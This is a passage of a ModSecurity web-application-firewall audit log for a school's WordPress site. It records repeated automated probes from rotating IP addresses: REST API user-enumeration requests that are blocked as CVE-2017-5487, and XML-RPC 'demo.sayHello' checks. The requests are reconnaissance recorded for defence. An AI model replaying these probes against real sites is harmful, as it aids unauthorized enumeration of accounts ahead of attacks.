"apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460109500178 5613 (- - -) Stopwatch2: 1746460109500178 5613; combined=4350, p1=514, p2=3544, p3=94, p4=36, p5=95, sr=71, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ae9cd6a-Z-- --fa76f87a-A-- [05/May/2025:22:48:30 +0700] aBjdzoZWvR7-42f6JrAK_AAAAMQ 103.236.140.4 37032 103.236.140.4 8181 --fa76f87a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fa76f87a-C-- demo.sayHello --fa76f87a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa76f87a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460110986779 5743 (- - -) Stopwatch2: 1746460110986779 5743; combined=4169, p1=545, p2=3402, p3=28, p4=30, p5=96, sr=71, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa76f87a-Z-- --c8fbee5e-A-- [05/May/2025:22:48:52 +0700] aBjd5E2V_h1VFAgsfgZ6cgAAAA4 103.236.140.4 37200 103.236.140.4 8181 --c8fbee5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c8fbee5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8fbee5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460132359324 3771 (- - -) Stopwatch2: 1746460132359324 3771; combined=2183, p1=678, p2=1470, p3=0, p4=0, p5=35, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8fbee5e-Z-- --881cd821-A-- [05/May/2025:22:48:55 +0700] aBjd5wRwKNFSM6B7_LaeZwAAAIE 103.236.140.4 37216 103.236.140.4 8181 --881cd821-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.134 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --881cd821-C-- demo.sayHello --881cd821-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --881cd821-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460135135483 5556 (- - -) Stopwatch2: 1746460135135483 5556; combined=4096, p1=505, p2=3371, p3=29, p4=31, p5=94, sr=75, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --881cd821-Z-- --a0e6cb60-A-- [05/May/2025:22:48:56 +0700] aBjd6E2V_h1VFAgsfgZ6dQAAABI 103.236.140.4 37238 103.236.140.4 8181 --a0e6cb60-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.25 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a0e6cb60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0e6cb60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460136932339 3068 (- - -) Stopwatch2: 1746460136932339 3068; combined=1302, p1=455, p2=812, p3=0, p4=0, p5=35, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0e6cb60-Z-- --041f0935-A-- [05/May/2025:22:48:59 +0700] aBjd6wRwKNFSM6B7_LaeaQAAAIA 103.236.140.4 37262 103.236.140.4 8181 --041f0935-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.25 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --041f0935-C-- demo.sayHello --041f0935-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --041f0935-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460139688752 5599 (- - -) Stopwatch2: 1746460139688752 5599; combined=4134, p1=527, p2=3381, p3=33, p4=35, p5=93, sr=75, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --041f0935-Z-- --bfe6332e-A-- [05/May/2025:22:50:39 +0700] aBjeTwRwKNFSM6B7_LaejwAAAI4 103.236.140.4 38038 103.236.140.4 8181 --bfe6332e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.0 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.0 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bfe6332e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfe6332e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460239440170 2695 (- - -) Stopwatch2: 1746460239440170 2695; combined=1204, p1=408, p2=767, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfe6332e-Z-- --fbf7cd68-A-- [05/May/2025:22:50:42 +0700] aBjeUvZJDMuQndL03JNaTwAAAFY 103.236.140.4 38070 103.236.140.4 8181 --fbf7cd68-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.0 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.0 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fbf7cd68-C-- demo.sayHello --fbf7cd68-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbf7cd68-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460242219100 6015 (- - -) Stopwatch2: 1746460242219100 6015; combined=4371, p1=542, p2=3593, p3=31, p4=35, p5=99, sr=78, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbf7cd68-Z-- --b4297b3e-A-- [05/May/2025:22:51:09 +0700] aBjebU2V_h1VFAgsfgZ6twAAAA0 103.236.140.4 38330 103.236.140.4 8181 --b4297b3e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b4297b3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4297b3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460269764984 2539 (- - -) Stopwatch2: 1746460269764984 2539; combined=1207, p1=494, p2=689, p3=0, p4=0, p5=24, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4297b3e-Z-- --ac682031-A-- [05/May/2025:22:51:12 +0700] aBjecE2V_h1VFAgsfgZ6uQAAAAs 103.236.140.4 38348 103.236.140.4 8181 --ac682031-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.100 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ac682031-C-- demo.sayHello --ac682031-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac682031-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460272665128 5963 (- - -) Stopwatch2: 1746460272665128 5963; combined=4439, p1=572, p2=3633, p3=35, p4=34, p5=97, sr=77, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac682031-Z-- --28a79f72-A-- [05/May/2025:22:51:22 +0700] aBjeegRwKNFSM6B7_LaepwAAAIg 103.236.140.4 38424 103.236.140.4 8181 --28a79f72-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --28a79f72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28a79f72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460282201651 2980 (- - -) Stopwatch2: 1746460282201651 2980; combined=1480, p1=505, p2=944, p3=0, p4=0, p5=31, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28a79f72-Z-- --5f8f8b74-A-- [05/May/2025:22:51:24 +0700] aBjefPZJDMuQndL03JNabwAAAEg 103.236.140.4 38464 103.236.140.4 8181 --5f8f8b74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.210 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5f8f8b74-C-- demo.sayHello --5f8f8b74-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f8f8b74-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460284982488 5669 (- - -) Stopwatch2: 1746460284982488 5669; combined=4251, p1=514, p2=3520, p3=31, p4=34, p5=90, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f8f8b74-Z-- --73dda074-A-- [05/May/2025:22:51:39 +0700] aBjei02V_h1VFAgsfgZ6xQAAAA0 103.236.140.4 38594 103.236.140.4 8181 --73dda074-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --73dda074-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73dda074-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460299420483 2912 (- - -) Stopwatch2: 1746460299420483 2912; combined=1254, p1=401, p2=820, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73dda074-Z-- --9b968818-A-- [05/May/2025:22:51:42 +0700] aBjejk2V_h1VFAgsfgZ6yQAAABg 103.236.140.4 38618 103.236.140.4 8181 --9b968818-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9b968818-C-- demo.sayHello --9b968818-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b968818-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460302199890 5808 (- - -) Stopwatch2: 1746460302199890 5808; combined=4284, p1=540, p2=3506, p3=32, p4=45, p5=95, sr=74, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b968818-Z-- --9af5d92d-A-- [05/May/2025:22:51:56 +0700] aBjenPZJDMuQndL03JNajAAAAEk 103.236.140.4 38726 103.236.140.4 8181 --9af5d92d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9af5d92d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9af5d92d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460316439675 2701 (- - -) Stopwatch2: 1746460316439675 2701; combined=1255, p1=408, p2=819, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9af5d92d-Z-- --87e1206d-A-- [05/May/2025:22:51:59 +0700] aBjen4ZWvR7-42f6JrALZwAAANc 103.236.140.4 38754 103.236.140.4 8181 --87e1206d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.61 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --87e1206d-C-- demo.sayHello --87e1206d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --87e1206d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746460319246755 6892 (- - -) Stopwatch2: 1746460319246755 6892; combined=4962, p1=690, p2=3983, p3=39, p4=43, p5=136, sr=135, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87e1206d-Z-- --c97f7d24-A-- [05/May/2025:22:52:10 +0700] aBjeqvZJDMuQndL03JNamQAAAEk 103.236.140.4 38834 103.236.140.4 8181 --c97f7d24-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c97f7d24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c97f7d24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746460330376221 2678 (- - -) Stopwatch2: 1746460330376221 2678; combined=1218, p1=394, p2=788, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c97f7d24-Z-- --fb82e35b-A-- [05/May/2025:22:52:13 +0700] aBjerfZJDMuQndL03JNanAAAAFY 103.236.140.4 38850 103.236.140.4 8181 --fb82e35b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.79 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fb82e35b-C-- demo.sayHello --fb82e35b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb82e35b-H-- Message: Warning. Match of "pmFromFile 